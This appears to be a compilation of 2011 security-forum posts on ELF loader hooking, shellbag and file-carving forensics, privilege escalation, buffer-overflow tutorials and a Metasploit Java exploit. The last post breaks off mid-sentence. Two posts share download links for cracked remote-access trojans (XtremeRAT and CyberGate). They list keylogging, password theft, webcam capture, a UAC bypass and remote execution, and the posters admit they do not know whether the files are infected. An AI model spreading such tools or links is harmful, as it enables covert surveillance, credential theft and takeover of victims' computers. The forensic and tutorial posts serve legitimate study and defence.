ld-linux.so ELF hooker Stéphane and myself are releasing a new tool injecting code at runtime, just between the ELF loader and target binary. It is an alternative to LD_PRELOAD, just a little bit more intrusive but 100% reliable Sources were released on Github When a binary is execve(), the kernel extracts from the ELF headers the interpreter to be launched, usually /lib/ld-linux.so.2. The kernel creates a new process and prepares the environment (arguments and auxiliary data). The target ELF entry point is set in auxiliary vector of type "ENTRY". Then the kernel opens the requested interpreter, maps the memory regions and start its execution at ld's ELF entry point. Then the loader analyzes the target ELF file, performs its loader work and sets EIP to target ELF entry point (extracted from auxv). At this point, main()'s program is eventually executed. Our goal was to permit the execution of code for abitrary dynamically linked binary without patching each of them. So our interest moved on the loader, the common point between most executables. Thus, we decided to patch a normal ld in order to inject code. My awesome colleague, Stéphane Duverger (the ramooflax author!) and myself wrote ld-shatner. Its task is to patch ld-linux.so file accordingly: After ELF header, we shift "ELF program header" a few pages away In this new section, we inject a "loader routine" (hooked.s) and embedded code to be executed at runtime After having been saved in our section, ld's ELF entry point is overwritten to jump directly on our routine. This routine extracts from auxiliary vectors the target ELF entry point and overwrites it with a pointer to our embedded code (func() in the payload). Original ld's entry point is called and ld works as usual Eventually, it calls entry point set in auxiliary vector (which was replaced by a pointer to our payload) Embdded code runs It returns to our routine which finally jumps on original target entry point Some pictures before/after ld-shatner voodoo: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]ld-shatner voodo[/TD] [/TR] [/TABLE] Screenshot $ make clean all $ cp /lib/ld-linux.so.2 /bin/ls . $ ./ld-shatner ld-linux.so.2 obj.elf $ sudo cp ld-hook.so /lib/ $ ./interpatch ls $ ./ls ld-hook <---------------------- output of obj.elf [...] (Ok, we cheat for the moment because we have to patch ls binary but we will not have to do that eventually) So what? My ultimate goal for ld-shatner is to use this method for starting applications in my sandbox project, seccomp-nurse. For the moment, I rely on LD_PRELOAD feature but this approach is... hackish and I have to work around some bugs because of this special context... Sursa: http://justanothergeek.chdir.org/2011/11/ld-linuxso-elf-hooker.html

[h=5]XtremeRATv3.2 Cracked Version[/h]Noviembre 27, 2011, 06:28:40 pm Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Version 3.2 Changes: - Corrected webcam problems. - Corrected error when close the control center window and the webcam, desktop capture or audio are opened. - Added option to resize the desktop preview image. - Copy and Paste functions was added in filemanager. - Options to get a preview image of an selected window was added. - Added password protection to your settings. - Added new skins. - Added a possibility to rename files when download files with same name. - Added a CheckBox to update desktop preview images only of the selected servers. This will reduce network traffic. - Corrected an error in mouselogger that don't save all clicks. - Mouselogger corrected on client side. - Added option to select windows always on top. - Added notification when server disconnect. - Was corrected the function that show all flags from servers. - Connectir public von limit foersions (only 100000000000000000000000000000000 servers) DOWNLOAD : http://www.multiupload.com/3EDV3BCDQ0 Fuente: udtools.net Sursa: http://www.underc0de.org/foro/index.php?topic=8249.msg29369

[h=5]CyberGate 1.18 Cracket Version [/h]Noviembre 27, 2011, 06:30:13 pm Nu l-am testat, nu stiu daca e infectat, nu sunt raspunzator de nimic. - Reverse connection Remote Administration Tool. - BaseCode64, Xor, RC4 and AES traffic encryption (depends on features, etc ... Obviously they do not use same encryption ciphers due to application stability and performance. Some ciphers would make this software a lot slower and unstable if used for certain features) - Language support - View options - Multi port support - Remote connection search option - Injection option to create new servers - Anti debugging options to create new server - Startup methods option to create new server - Password protection method to create new server - Optional binder option to create new server - Icon changer option to create new server - Delayed execution option to create new server - Customizable installation folder and file name to create new server - Ftp logs support - Automatic DNS updater - Multi profiles builder - UAC (Vista and Seven protection) bypass on server - Keylogger option - Password recovery tool (browser, msn, windows ...) - Very light stub (~265kb) - Chat feature - File manager - Registry editor - Services manager - Windows manager - Processes manager - Clipboard manager - Socks 4/5 Proxy - Http Proxy - Mass features - Installed programs manager - Remote desktop (with capture) - Remote webcam view (with capture) - Capture audio - Remote download and execute - DOS prompt - Send message boxes - Control desktop items (taskbar, icon, start menu) - Active ports list - Server control (update, disconnect, restart) - Remote open HTTP URL - Send file and execute - CD Open and Close - Reverse Mouse Option - Remote Power Options (Shutdown, Restart, etc ...) - Remote Mouse Lock - Remote Keyboard Lock - Remote Icons Hide/show - Remote Start Hide/show - Group support (connections can be organized in groups) - Several function that can be performed from group panel - URL visiter (with hidden feature) - VBscript console - Multi-user keylogger/file search - Local file erases tool (erase files beyond recovery) - Local startup manager tool - Startup manager - Programs assist - Connection log incorporated in the client GUI - CyberGate has task managers for client and server on connecting - Task logs - Add Notes for your connections if you want - Multiple tabs in the client making your life easier (connections tab, group panel tab, client tasks tab, etc ...) - Automatically map ports if your router supports uPnP - GeoIP server tracking for accurate remote computer localization tracking - Easy search function on password recovery tool - Thumbnails view on file manager allowing display all images of a remote folder - Lock station (ability to lock CyberGate after a certain time of idling or by button press to avoid outsiders from accessing your CyberGate client - Webloader (a webdownloader with 3.5 Kb) - Windows OS bit system (x32/x64) - Recoded webcam capture - Recoded password recovery - Run remote files as admin - More then 70 skins to choose from DOWNLOAD: http://www.multiupload.com/GEMQNJOKD0 Original forum post : http://www.hackforums.net/showthread.php?tid=1906067 Sursa: CyberGate 1.18 Cracket Version

File Carving! By Christiaan Beek. File Carving’ or sometimes simply "carving", is the process of extracting a collection of data from a larger data set. Data carving techniques frequently occur during a digital investigation when the unallocated file system space is analyzed to extract files. There are many carving techniques and tools available that can be used to investigate disk/removable-media images. For example after many years, an update of the famous carving tool 'Scalpel' was just released. However these tools are not by default useful when investigating a dump from a cell-phone because every mobile-phone vendor has its own way for storing data into the phone memory. There's even a difference between the phone models. A different approach and development of tools is necessary. For reading more about file carving basics,techniques and challenges, read my new whitepaper: Download: http://www.mcafee.com/us/resources/white-papers/foundstone/wp-intro-to-file-carving.pdf Sursa: Introduction to File Carving! via reddit.com

[h=1]Windows shellbag forensics[/h] Microsoft Windows uses a set of Registry keys known as "shellbags" to maintain the size, view, icon, and position of a folder when using Explorer. These keys are useful to a forensic investigator. Shellbags persist information for directories even after the directory is removed, which means that they can be used to enumerate past mounted volumes, deleted files, and user actions. Yuandong Zhu, Pavel Gladyshev, and Joshua James provided a nice overview of the investigative value of shellbags in "Using shellbag information to reconstruct user activities" [pdf]; however, they do not describe how to programmatically access the data. Allan S Hay went into greater detail in his December, 2004 document "MiTeC Registry Analyser" [pdf], although he also leaves out a thorough analysis of the format. TZWorks provides an effective closed-source shellbag parser sbag, but does not explain its algorithm. Yogesh Khatri first described the basic structure of Windows Shell Items in his blog post for 42 LLC entitled Shell BAG Format Analysis. Joachim Metz went on to described the binary format of the Windows Shell Item structures with great detail in Windows Shell Item format specification [pdf]. This page documents an approach to parsing shellbags in detail, as well as introduces an open-source, cross-platform shellbag parser. [h=2]Shellbag locations[/h] Shellbags may be found in a few locations, depending on operating system version and user profile. On a Windows XP system, shellbags may be found under: HKEY_USERS\{USERID}\Software\Microsoft\Windows\Shell\ HKEY_USERS\{USERID}\Software\Microsoft\Windows\ShellNoRoam\ The NTUser.dat hive file persists the Registry key HKEY_USERS\{USERID}\. On a Windows 7 system, shellbags may be found under: HEKY_USERS\{USERID}\Local Settings\Software\Microsoft\Windows\Shell\ The UsrClass.dat hive file persists the registry key HKEY_USERS\{USERID}\. [h=2]Shellbag Parsing[/h] Let us begin with the Shell\ key. The Shell\ key does not have any values. Under the Shell\ key are two keys: Shell\Bags\ and Shell\BagMRU\. [h=3]FolderData[/h] Each subkey under Shell\Bags\ is named as increasing integers from one, such as Shell\Bags\1\ or Shell\Bags\2\. Let us call these subkeys FolderData, since they each represent one item viewed in Explorer, and this is usually a folder. FolderData subkeys do not have any values, but often have subkeys. The most common subkey is Shell\Bags\{Int}\Shell\, but there are a few other possibilities (ComDlg, Desktop, etc.). The subkeys under a FolderData describe the settings, position, and icon when viewing the folder in Explorer. In particular, a Registry value whose name begins with ItemPos specifies the location of the icons for a given desktop resolution. For example, on my Windows 7 system, the Registry key HKEY_USERS\{USERID}\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} has 12 values that record various configurations. This set includes the value ItemPos1427x820(1) that has type REG_BIN with length 0x120: 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0010 15 00 00 00 51 00 00 00 14 00 1F 60 40 F0 5F 64 ....Q......`@._d 0020 81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15 00 00 00 .P......./.N.... 0030 A0 00 00 00 46 00 3A 00 02 02 00 00 10 3D 0C 8E ....F.:......=.. 0040 20 00 43 79 67 77 69 6E 2E 6C 6E 6B 00 00 2C 00 .Cygwin.lnk..,. 0050 03 00 04 00 EF BE 10 3D 0C 8E 10 3D 0C 8E 14 00 .......=...=.... 0060 00 00 43 00 79 00 67 00 77 00 69 00 6E 00 2E 00 ..C.y.g.w.i.n... 0070 6C 00 6E 00 6B 00 00 00 1A 00 15 00 00 00 02 00 l.n.k........... 0080 00 00 5A 00 3A 00 42 06 00 00 10 3D 91 7C 20 00 ..Z.:.B....=.| . 0090 4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00 MOZILL~1.LNK..>. 00A0 03 00 04 00 EF BE 10 3D 91 7C 10 3D 61 85 14 00 .......=.|.=a... 00B0 00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 ..M.o.z.i.l.l.a. 00C0 20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00 .F.i.r.e.f.o.x. 00D0 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 41 01 00 00 ..l.n.k.....A... 00E0 51 00 00 00 30 00 31 00 00 00 00 00 10 3D 2C 81 Q...0.1......=,. 00F0 10 00 4D 49 52 00 1E 00 03 00 04 00 EF BE 10 3D ..MIR..........= 0100 B0 80 10 3D A7 8C 14 00 00 00 4D 00 49 00 52 00 ...=......M.I.R. 0110 00 00 12 00 41 01 00 00 51 00 00 00 00 00 00 00 ....A...Q....... With no tools beyond Regedit (or Regview.py), Windows 8.3 filenames (eg. MOZILL~1.LNK) and Unicode filenames (eg. Mozilla Firefox.lnk) stand out. Fortunately, by applying the formats found in Joachim's paper, more details can be extracted. Throughout this document, I refer to this Registry value type as an ITEMPOS value. [h=3]ITEMPOS values[/h] The ITEMPOS value's structure is a list of Windows File Entry Shell Items (SHITEM_FILEENTRY) terminated by an entry whose size field is zero. The list begins at offset 0x10. Items are preceeded by 0x8 bytes whose meaning is unknown. The minimum size of a SHITEM_FILEENTRY structure is 0x15 bytes, so entries whose size field is less than 0x15 should be skipped. The valid SHITEM_FILEENTRY items have the following structure (in pseudo-C / 010 Editor template format): typedef struct SHITEM_FILEENTRY { UINT16 size; UINT16 flags; UINT32 filesize; DOSDATE date; DOSTIME time; FILEATTR16 fileattrs; string short_name; if (offset() % 2 != 0) { UINT8 alignment; } UINT16 ext_size; UINT16 ext_version; if (ext_version >= 0x0003) { UINT16 unknown0; // == 0x0004 UINT16 unknown1; // == 0xBEEF DOSDATE creation_date; DOSTIME creation_time; DOSDATE access_date; DOSTIME access_time; UINT32 unknown2; } if (ext_version >= 0x0007) { FILEREFERENCE file_ref; UINT64 unknown3; UINT16 long_name_size; if (ext_version >= 0x0008) { UINT32 unknown4; } wstring long_name; if (long_name_size > 0) { wstring long_name_addl; } } else if (ext_version >= 0x0003) { wstring long_name; } if (ext_version >= 0x0003) { UINT16 unknown5; } UINT8 padding[size - (offset() - offset(size)]; } } SHITEM_FILEENTRY; FILEREFERENCE is a 64bit MFT file reference structure (48 bits file MFT record number, 16 bits MFT sequence number). FILEATTRS is a 16 bit set of flags that specifies attributes such as if the item is read-only or a system file. Applying this template to the ITEMPOS Registry value, we see there are four list items: one invalid entry, and three SHITEM_FILEENTRY items. [COLOR=red]00 00 00 00 [/COLOR] --> header/footer [COLOR=blue]00 00 00 00 [/COLOR] --> unknown padding (item position?) [COLOR=green]00 00 00 00 [/COLOR] --> invalid SHITEM_FILEENTRY [COLOR=yellow]00 00 00 00 [/COLOR] --> SHITEM_FILEENTRY 0000 [COLOR=red]00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[/COLOR] ................ 0010 [COLOR=blue]15 00 00 00 51 00 00 00[/COLOR] [COLOR=green]14 00 1F 60 40 F0 5F 64[/COLOR] ....Q......`@._d 0020 [COLOR=green]81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15[/COLOR] [COLOR=blue]00 00 00[/COLOR] .P......./.N.... 0030 [COLOR=blue]A0 00 00 00[/COLOR][COLOR=yellow] 46 00 3A 00 02 02 00 00 10 3D 0C 8E[/COLOR] ....F.:......=.. 0040 [COLOR=yellow]20 00 43 79 67 77 69 6E 2E 6C 6E 6B 00 00 2C 00[/COLOR] .Cygwin.lnk..,. 0050 [COLOR=yellow]03 00 04 00 EF BE 10 3D 0C 8E 10 3D 0C 8E 14 00[/COLOR] .......=...=.... 0060 [COLOR=yellow]00 00 43 00 79 00 67 00 77 00 69 00 6E 00 2E 00[/COLOR] ..C.y.g.w.i.n... 0070 [COLOR=yellow]6C 00 6E 00 6B 00 00 00 1A 00[/COLOR] [COLOR=blue]15 00 00 00 02 00[/COLOR] l.n.k........... 0080 [COLOR=blue]00 00 [/COLOR][COLOR=yellow]5A 00 3A 00 42 06 00 00 10 3D 91 7C 20 00[/COLOR] ..Z.:.B....=.| . 0090 [COLOR=yellow]4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00[/COLOR] MOZILL~1.LNK..>. 00A0 [COLOR=yellow]03 00 04 00 EF BE 10 3D 91 7C 10 3D 61 85 14 00[/COLOR] .......=.|.=a... 00B0 [COLOR=yellow]00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00[/COLOR] ..M.o.z.i.l.l.a. 00C0 [COLOR=yellow]20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00[/COLOR] .F.i.r.e.f.o.x. 00D0 [COLOR=yellow]2E 00 6C 00 6E 00 6B 00 00 00 1C 00[/COLOR][COLOR=blue] 41 01 00 00[/COLOR] ..l.n.k.....A... 00E0 [COLOR=blue]51 00 00 00[/COLOR][COLOR=yellow] 30 00 31 00 00 00 00 00 10 3D 2C 81[/COLOR] Q...0.1......=,. 00F0 [COLOR=yellow]10 00 4D 49 52 00 1E 00 03 00 04 00 EF BE 10 3D[/COLOR] ..MIR..........= 0100 [COLOR=yellow]B0 80 10 3D A7 8C 14 00 00 00 4D 00 49 00 52 00[/COLOR] ...=......M.I.R. 0110 [COLOR=yellow]00 00 12 00 [/COLOR][COLOR=blue]41 01 00 00 51 00 00 00 [/COLOR][COLOR=red]00 00 00 00[/COLOR] ....A...Q....... Taking the first valid entry from offset 0x34, let's parse out the fields from the binary. The following block visually maps out the relevant bytes, while the table translates each field into a human readable value. [COLOR=yellow]00 00 00 00[/COLOR] --> SHITEM_FILEENTRY size [COLOR=green]00 00 00 00[/COLOR] --> filesize [COLOR=blue]00 00 00 00[/COLOR] --> timestamp [COLOR=red]00 00 00 00[/COLOR] --> filename 0000 [COLOR=yellow]46 00[/COLOR] 3A 00 [COLOR=green]02 02 00 00[/COLOR] [COLOR=blue]10 3D 0C 8E[/COLOR] 20 00 [COLOR=red]43 79[/COLOR] [COLOR=yellow]F.[/COLOR]:.[COLOR=green]....[/COLOR][COLOR=blue]w.=.[/COLOR]Ž [COLOR=red]Cy[/COLOR] 0010 [COLOR=red]67 77 69 6E 2E 6C 6E 6B 00[/COLOR] 00 2C 00 03 00 04 00 [COLOR=red]gwin.lnk.[/COLOR].,..... 0020 EF BE [COLOR=blue]10 3D 0C 8E 10 3D 0C 8E [/COLOR]14 00 00 00 [COLOR=red]43 00[/COLOR] ï¾[COLOR=blue].=.Ž.=.Ž[/COLOR]....[COLOR=red]C.[/COLOR] 0030 [COLOR=red]79 00 67 00 77 00 69 00 6E 00 2E 00 6C 00 6E 00[/COLOR] [COLOR=red]y.g.w.i.n...l.n. [/COLOR] 0040 [COLOR=red]6B 00 00 00[/COLOR] 1A 00 [COLOR=red]k...[/COLOR].. [TABLE] [TR] [TH]Offset[/TH] [TH]Field[/TH] [TH]Value[/TH] [/TR] [TR] [TD]0x00[/TD] [TD]ITEMPOS size[/TD] [TD]0x46[/TD] [/TR] [TR] [TD]0x04[/TD] [TD]Filesize[/TD] [TD]0x202[/TD] [/TR] [TR] [TD]0x08[/TD] [TD]Modified Date[/TD] [TD]August 16, 2010 at 17:48:24[/TD] [/TR] [TR] [TD]0x0E[/TD] [TD]8.3 Filename[/TD] [TD]Cygwin.lnk[/TD] [/TR] [TR] [TD]0x22[/TD] [TD]Created Date[/TD] [TD]August 16, 2010 at 17:48:24[/TD] [/TR] [TR] [TD]0x26[/TD] [TD]Modified Date[/TD] [TD]August 16, 2010 at 17:48:24[/TD] [/TR] [TR] [TD]0x2E[/TD] [TD]Unicode Filename[/TD] [TD]Cywgin.lnk[/TD] [/TR] [/TABLE] At this point, it is easy to write parser that explores the FolderData keys under the Shell registry key. For each FolderData, the parser might enumerate each ITEMPOS value and consider the binary blob. By applying the binary template above, the tool could identify filenames, MAC timestamps, and other metadata independent of the filesystem MFT. Unfortunately, we're still missing a key piece of information: the full file path. [h=3]BagMRU tree[/h] To recover file paths from Shellbags, we'll need to consider the Registry keys under BagMRU. The subkeys under Shell\BagMRU form a recursive, tree-like structure that mirrors the file system on disk. Shell\BagMRU is the root of the tree. Each subkey is a node representing a folder, and like a folder, may contain children nodes. Yet, unlike (most) folders, the nodes are named as increasing integers from zero. For example, the branch Shell\BagMRU\0 might have the children 0, 1, and 2. All nodes in this tree have a value named MRUListEx, and many have a value named NodeSlot. NodeSlot is what interests us, as it forms the link between the filesystem tree structure and the FolderData keys. A NodeSlot value has type REG_DWORD and should be interpreted as a pointer to the FolderData key with the same name. For example, on my workstation, the key Shell\BagMRU\1\1\3\0 has a NodeSlot value of 144. This means that the FolderData Shell\Bags\144\ corresponds to a folder with a path of four components. What are they? The components are described by the values at Shell\BagMRU\1, Shell\BagMRU\1\1, Shell\BagMRU\1\1\3, and Shell\BagMRU\1\1\3\0. [h=3]SHITEMLIST[/h] In addition to the values MRUListEx and NodeSlot, nodes of the Shell\BagMRU tree have one value for each subkey. The values have the same name as the subkey; since the subkeys are named as increasing integers, so are the values. Each value records metadata about the filesystem path component associated with the subkey. The values have type REG_BIN, and have an internal binary structure known as an SHITEMLIST. An SHITEMLIST is formed by contiguous items terminated by an empty item. Practically, though, the SHITEMLIST of a BagMRU node will have two entries: a relevant entry, and the empty terminator item. The first two bytes of each SHITEM gives the item's size. Joachim's paper on Window's shell items is the best resource for understanding the variations among SHITEM entries. From a high level, there are at least ten types of items that range from SHITEM_FILEENTRY and SHITEM_FOLDERENTRY to SHITEM_CONTTROLPANELENTRY. For each of these types, we can extract at least a path component such as "My Documents" or "\\myserver". Fortunately, most items have type SHITEM_FOLDERENTRY, which provides additional metadata including MAC timestamps. A small number of items do not conform to the known structure, although these do not usually contain any human readable strings or hints. [h=3]Putting it all together[/h] With the SHITEMLIST structure in hand, we now have enough information to comprehensively parse Windows shellbags. To do this, first recurse down the Shell\BagMRU keys while computing directory paths. At each node, record any available metadata and lookup the associated FolderData. Recall that the FolderData may indicate some of the items contained by the directory, so record this metadata, too. Finally, format and enjoy! The following code block lists the algorithm in a Pythonish language for the programmers in the room. def get_shellbags(): shellbags = [] bagmru_key = shell_key.subkey("BagMRU") bags_key = shell_key.subkey("Bags") def shellbag_rec(key, bag_prefix, path_prefix): """ Function to recursively parse the BagMRU Registry key structure. Arguments: `key`: The current 'BagsMRU' key to recurse into. `bag_prefix`: A string containing the current subkey path of the relevant 'Bags' key. It will look something like '1\\2\\3\\4'. `path_prefix` A string containing the current human-readable, file system path so far constructed. Returns: A list of paths to filesystem artifacts """ # First, consider the current key, and extract shellbag items slot = key.value("NodeSlot").value() # Look at ..\Shell, and ..\Desktop, etc. for bag in bags_key.subkey( slot ).subkeys(): # Only consider ITEMPOS keys for value in [value for value in bag.values() if \ "ItemPos" in value.name()]: # Call our binary processing code to extract items new_items = process_itempos(value) for item in new_items: shellbags.append(path_prefix + item.path) # Next, recurse into each subkey of this BagMRU node (1, 2, 3, ...) for value in value for value in key.values(): # Call our binary processing code to extract item new_item = process_bag(value) shellbags.append(path_prefix + new_item.path) shellbag_rec(key.subkey( value.name() ), bag_prefix + "\\" + value.name(), new_item.path ) shellbag_rec("HKEY_USERS\{USERID}\Software\Microsoft\Windows\ShellNoRoam", "", "") return shellbags [h=2]Shellbags.py[/h] Using these concepts, I've implemented a cross-platform shellbag parser for Windows XP and greater in the Python programming language. The code is freely available here, so all algorithms and structures are accessible to interested parties. I've licensed the code under the Apache 2.0 license, so please feel encouraged to take and improve the routines as you feel fit. As a benchmark, shellbags.py tends to identify at least the items returned by the sbag utility, and in some cases returns more. Shellbags.py accepts the path to a raw Registry hive acquired forensically as a command line argument. To ensure interoperability, output is formatted according to the Bodyfile specification by default. The following block lists a demonstration of me running shellbags.py against a Windows XP NTUSER.dat Registry hive. $ python shellbags.py ~/projects/registry-files/willi/xp/NTUSER.DAT.copy0 ... 0|\My Documents (Shellbag)|0|0|0|0|0|978325200|978325200|18000|978325200 0|\My Documents\Downloads (Shellbag)|0|0|0|0|0|1282762334|1282762334|18000|1281987456 0|\My Documents\My Dropbox (Shellbag)|0|0|0|0|0|1281989096|1282762296|18000|1281989050 0|\My Documents\My Music (Shellbag)|0|0|0|0|0|1281995426|1282239780|18000|1281987154 0|\My Documents\My Pictures (Shellbag)|0|0|0|0|0|1281995426|1282239780|18000|1281987152 0|\My Documents\My Dropbox (Shellbag)|0|0|0|0|0|978325200|978325200|18000|978325200 0|\My Documents\My Dropbox\Tools (Shellbag)|0|0|0|0|0|1281989092|1281989092|18000|1281989088 0|\My Documents\My Dropbox\Tools\Windows (Shellbag)|0|0|0|0|0|1281989140|1281989140|18000|1281989092 0|\My Documents\My Dropbox\Tools\Windows\7zip (Shellbag)|0|0|0|0|0|1281993604|1284668784|18000|1281989140 0|\My Documents\My Dropbox\Tools\Windows\Adobe (Shellbag)|0|0|0|0|0|1281994956|1284668784|18000|1281989140 0|\My Documents\My Dropbox\Tools\Windows\Bitpim (Shellbag)|0|0|0|0|0|1281994656|1284668784|18000|1281989140 ... To improve readability, I ran the output through the mactime utility to generate a timeline of activity. The following block lists a portion of this sample. ... Fri Jun 10 2011 14:09:02 0 m... 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\Mandiant Highlighter (Shellbag) Fri Jun 10 2011 16:09:56 0 m... 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\Mandiant Highlighter\MandiantHighlighter1.0.1.msi (Shellbag) Fri Jun 10 2011 16:10:18 0 ...b 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\Mandiant Highlighter\MandiantHighlighter1.1.2.msi (Shellbag) Fri Jun 10 2011 16:10:36 0 ma.. 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\Mandiant Highlighter\MandiantHighlighter1.1.2.msi (Shellbag) Fri Jun 10 2011 18:20:48 0 m... 0 0 0 0 \My Computer\{00020028-0000-0041-6400-6d0069006e00}\My Dropbox\Tools\Windows\Mandiant Malware INfo (Shellbag) Fri Jun 10 2011 18:20:50 0 m... 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\FTK\Imager_Lite_ 2.9.0 (Shellbag) Fri Jun 10 2011 21:06:44 0 ...b 0 0 0 0 \My Computer\C:\\Documents and Settings\Administrator\Desktop\IOCs\custom (Shellbag) Fri Jun 10 2011 22:43:14 0 m... 0 0 0 0 \My Computer\C:\\Documents and Settings\Administrator\Desktop\IOCs\new (Shellbag) Fri Jun 10 2011 22:52:02 0 m... 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\FTK (Shellbag) ... [h=3]Help[/h] For reference, the following code block lists the command line parameters accepted by shellbags.py. Now get going and try it out! usage: shellbags.py [-h] [-v] [-p] file [file ...] Parse Shellbag entries from a Windows Registry. positional arguments: file Windows Registry hive file(s) optional arguments: -h, --help show this help message and exit -v Print debugging information while parsing -p If debugging messages are enabled, augment the formatting with ANSI color codes Sursa: http://www.williballenthin.com/forensics/shellbags/index.html

Rounding Pointers – Type Safe Capabilities with C++ Meta Programming Alexander Warg, Adam Lackorzynski Technische Universität Dresden Department of Computer Science Operating Systems Group {warg,adam}@os.inf.tu-dresden.de ABSTRACT Recent trends in secure operating systems indicate that an object-capability system is the security model with pre- eminent characteristics and practicality. Unlike traditional operating systems, which use a single global name space, object-capability systems name objects per protection do- main. This allows a ne-grained isolation of the domains and follows the principle of least authority. Programming in such an environment diers considerably from traditional programming models. The ne-grained ac- cess to functionality requires a programming environment that supports the programmer when using a capability sys- tem. In this paper, we present an object-oriented framework that uses the C++ programming language to oer a frame- work for building and using operating-system components and applications. Download: http://www.sigops.org/sosp/sosp11/workshops/plos/03-warg.pdf

[h=1]CSS Reference[/h]This an alphabetical list of CSS features. If you are going to add or modify a page, please fit in with the template CSS Reference:Property Template and modify as required. The basic template for example pages can be found here: samples/cssref/TEMPLATE.html. Feel free to discuss any questions or suggestions on the Talk:CSS Reference page. See also Mozilla CSS Extensions for Gecko-specific properties prefixed with -moz-. See Vendor-prefixed CSS Property Overview by Peter Beverloo for all prefixed properties. Link: https://developer.mozilla.org/en/CSS/CSS_Reference

Metasploit sniffing the victim's network by Mbarb 10 days ago Using the Metasploit framework to sniff the victim's network can reveals interesting network communication Un exemplu simplu de pentest.

Encyclopaedia of Windows Privilege Escalation O prezentare. Linux: Taviso LD_Preload SUID Binaries Race condition/Symlink Crappy perl/python script Bad permissions Windows: Taviso KiTrap0D Latest win32k.sys font bug metasploit:getSystem() No suid No env passing Online: https://docs.google.com/viewer?url=http://www.insomniasec.com/publications/WindowsPrivEsc.ppt Download: http://www.insomniasec.com/publications/WindowsPrivEsc.ppt

[h=4]Supplemental Buffer Overflow Tutorial Series[/h][h=4]Supplemental Buffer Overflow Tutorial Series - Part 1[/h]Description: In this video I introduce the purpose of this series. It is just another look at buffer overflows because practice and repetition make perfect. [h=4]Supplemental Buffer Overflow Tutorial Series - Part 2[/h]Description: We talk about When and Why a program crashes because of a buffer overflow. We diddle a little in gdb and perl [h=4]Supplemental Buffer Overflow Tutorial Series - Part 3[/h]Description: In this part of the series we are looking at when the program actually crashes. [h=4]Supplemental Buffer Overflow Tutorial Series - Part 4[/h]Description: In this video we make a small change to the program which removes the vulnerability. [h=4]Supplemental Buffer Overflow Tutorial Series - Part 5[/h]Description: In this video we discuss how to find where EIP is overwritten using Binary Reduction (aka Binary Search) [h=4]Supplemental Buffer Overflow Tutorial Series - Part 6[/h]Description: In this part of the series we find a place to make EIP jump to so that it can execute our own code instead of crashing. We talk about little endian, nop sleds, how to find space in memory, how to use gdb to examine memory. [h=4]Supplemental Buffer Overflow Tutorial Series - Part 7[/h]Description: Finally we go and find shellcode. We talk about how shellcode corresponds to byte code and where to find it. [h=4]Supplemental Buffer Overflow Tutorial Series - Part 8[/h]Description: We wrap up our buffer overflow exploit and make it execute a shell for us. We also recap what happened to spawn the shell code and some of the implications. I introduce the Corelan tutorial serieis aswell. Sursa: - http://www.securitytube.net/video/2524 - http://www.securitytube.net/video/2525 - http://www.securitytube.net/video/2526 - http://www.securitytube.net/video/2527 - http://www.securitytube.net/video/2528 - http://www.securitytube.net/video/2529 - http://www.securitytube.net/video/2530 - http://www.securitytube.net/video/2531

Cross-Platform Java Exploit (Cve-2011-3544) Demonstration Description: This video uses Armitage and Metasploit to demonstrate a new cross-platform Java exploit. This exploit uses a loophole in the Java API to execute a payload outside of Java's security sandbox without requiring a user to approve some action. This works in Firefox, Internet Explorer, and Safari on Windows, MacOS X, and presumably Linux. Java 1.6.0u27, Java 1.7.0, and older versions are vulnerable. Sursa: Cross-Platform Java Exploit (Cve-2011-3544) Demonstration

[h=2]Exploit for critical Java vulnerability added to Metasploit[/h] Posted by Jonathan Cran on Nov 30, 2011 12:11:20 PM @_sinn3r and Juan Vasquez recently released a module which exploits the Java vulnerability detailed here by mihi and by Brian Krebs here. This is a big one. To quote Krebs: "A new exploit that takes advantage of a recently-patched critical security flaw in Java is making the rounds in the criminal underground." To determine if you're running java, you can use this link, and click “Do I have Java?” below the big red 'Free Java Download' button." We've tested the java_rhino exploit on a number of platforms, and below is a breakout of the results This vulnerability is particularly pernicious, as it is cross-platform, unpatched on some systems, and is an easy-to-exploit client-side that does little to make the user aware they're being exploited. [h=4]Microsoft Windows:[/h] Both Windows XP and Windows 7 were tested for vulnerability, a session was generated in every browser that was tested when the system was running java versions prior to the latest. Note that Chrome did prompt the user to let them know the java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browsers prompted the user. WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11 WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11 WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11 WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11 Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11 Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11 [h=4]Ubuntu Linux:[/h] Several linux desktops were tested, one with the Sun Java plugin, and another with the Iced Tea plugin. The Iced Tea java plugin was determined to not be vulnerable, though it wasn't tested extensively, it may still be vulnerable. An attempt was made to update the Ubuntu 10.04 device, and the java package was downloaded and linked to system java, however, the plugin was not installed as part of this process, and thus, even though the device was running the latest (build 1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: 